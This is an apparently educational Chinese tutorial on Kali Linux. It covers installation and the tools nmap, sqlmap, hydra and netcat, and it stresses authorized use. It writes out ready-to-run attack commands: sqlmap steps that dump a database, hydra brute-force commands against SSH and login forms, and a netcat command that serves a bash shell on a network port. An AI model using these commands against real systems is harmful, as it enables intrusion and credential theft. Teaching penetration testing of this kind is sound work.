本文介绍了 Kali Linux 操作系统的基本概念、安装配置方法以及 nmap、sqlmap、hydra、netcat 等核心安全工具的用法。涵盖端口扫描、SQL 注入检测、密码爆破及网络通信等内容,强调合法合规使用的重要性。
在网络安全领域,Kali Linux 是广为人知的操作系统。它专为渗透测试和安全审计设计,集成了大量专业工具。对于初学者而言,了解 Kali 的基本概念、安装方法以及核心工具的用法是进入该领域的关键第一步。
是基于 Debian 的开源 Linux 发行版,专门用于数字取证和渗透测试。它的前身是 BackTrack,后者整合了 IWHAX、WHOPPIX 和 Auditor 等 Live Linux 系统后演变为 Kali。Kali 的本质是 Linux 系统,其优势在于预装了数百种安全工具,避免了手动配置环境的繁琐。
访问官网 https://www.kali.org 下载最新 ISO 镜像。目前最新版本为 Kali Purple,增强了防守方(Blue Team)的工具集。
推荐使用 VMware Workstation 或 VirtualBox 进行安装。
kali(建议首次登录后修改密码)。新手常遇到虚拟机无法上网的问题。推荐在网络适配器设置中选择'桥接模式'(Bridged),使虚拟机直接连接物理网络。
ip addr 查看 IP 地址,使用 ping www.baidu.com 测试连通性。安装完成后,务必执行以下命令更新软件源和系统包:
sudo apt update && sudo apt full-upgrade -y
Kali 集成了大量工具,以下介绍四个最基础且核心的工具:Nmap、SQLMap、Hydra 和 Netcat。
Nmap 被称为'诸神之眼',是网络探测和端口扫描的首选工具。它可以发现主机、开放端口、服务版本及操作系统类型。
# 扫描单个 IP
nmap 192.168.1.10
# 扫描网段
nmap 192.168.1.0/24
-sS:TCP SYN 扫描(半开扫描,速度快且隐蔽)。-sV:检测服务版本信息。-O:尝试识别远程操作系统。-A:启用 OS 检测、版本检测、脚本扫描和 Traceroute。-T4:设置扫描模板(0-5),提高速度。示例:综合扫描
nmap -sS -sV -O -T4 192.168.1.10
-oN output.txt:保存标准输出到文本文件。-oX output.xml:保存 XML 格式结果。SQLMap 是针对 SQL 注入漏洞的自动化工具。它能检测并利用数据库漏洞,但必须在授权环境下使用。
sqlmap -u "http://target.com/page.php?id=1"
id)。sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name -C column_name --dump
--tamper 参数添加混淆脚本绕过防火墙。--batch 参数可非交互运行,但需谨慎。Hydra 是一款高效的在线密码暴力破解工具,支持多种协议(SSH, FTP, HTTP 等)。
# SSH 爆破
hydra -l admin -P password.txt ssh://192.168.1.10
# HTTP 表单爆破
hydra -l admin -P password.txt http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect"
-l:指定用户名。-L:从文件读取用户名列表。-p:指定密码。-P:从文件读取密码字典。-t:设置并发线程数。Kali 内置了 Hydra 的图形化前端(如 THC-Hydra GUI),适合不熟悉命令行的用户。通过菜单选择协议、输入目标 IP、加载字典即可开始任务。
Netcat(nc)基于 TCP/UDP 协议,可用于建立任意类型的网络连接,常用于传输文件或获取 Shell。
nc -lvp 6666
-l 监听模式,-v 详细输出,-p 端口号。nc 192.168.1.10 6666
攻击者通常使用反向 Shell 绕过防火墙限制。
nc -lvp 6666 -e /bin/bash
-e 选项将 shell 重定向到网络会话。nc 192.168.1.10 6666
nc -lvp 6666 > received_file.txt
nc 192.168.1.10 6666 < file_to_send.txt
在使用上述工具时,必须严格遵守法律法规。
apt install package_name。sudo 执行。Kali Linux 是网络安全从业者的必备工具集。掌握 Nmap、SQLMap、Hydra 和 Netcat 等核心工具的使用,能够帮助理解网络攻防的基本原理。然而,技术本身是中性的,关键在于使用者的目的。请务必将所学知识用于防御、加固系统及提升安全意识,共同维护网络空间的安全与秩序。
微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML转Markdown在线工具,online
通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online
将JSON字符串修饰为友好的可读格式。 在线工具,JSON美化和格式化在线工具,online